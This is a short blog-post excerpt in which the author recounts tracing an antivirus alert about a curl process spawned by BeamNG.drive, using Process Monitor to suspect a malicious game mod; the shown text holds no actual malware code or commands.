I Found Malware in a BeamNG Mod

WARNING: This post contains snippets of code from real malware. Do not run any of the code in this post outside of a secure, isolated virtual machine. Last week, I fired up BeamNG.drive hoping to enjoy a ride around Belasco City. But, just after I launched the game, I noticed an odd notification from my antivirus software. curl.exe ? That can’t be good. Cloudflare Radar confirmed the domain curl tried to access is known to be malicious. At this point, however, I wasn’t 100% sure this came from the game. Starting the investigation To find out if the problem was indeed in the game, I re-launched it with Process Monitor running. Filtering through the events, my suspicion was confirmed: a process launching cmd with a curl command was spawned by the game. But where exactly was this command coming from? Was it a mod, or was the game itself compromised? Inspecting the call stack in Process Monitor shows the command was executed by calling WinExec , a legacy function from 16-bit Windows ... Read full article.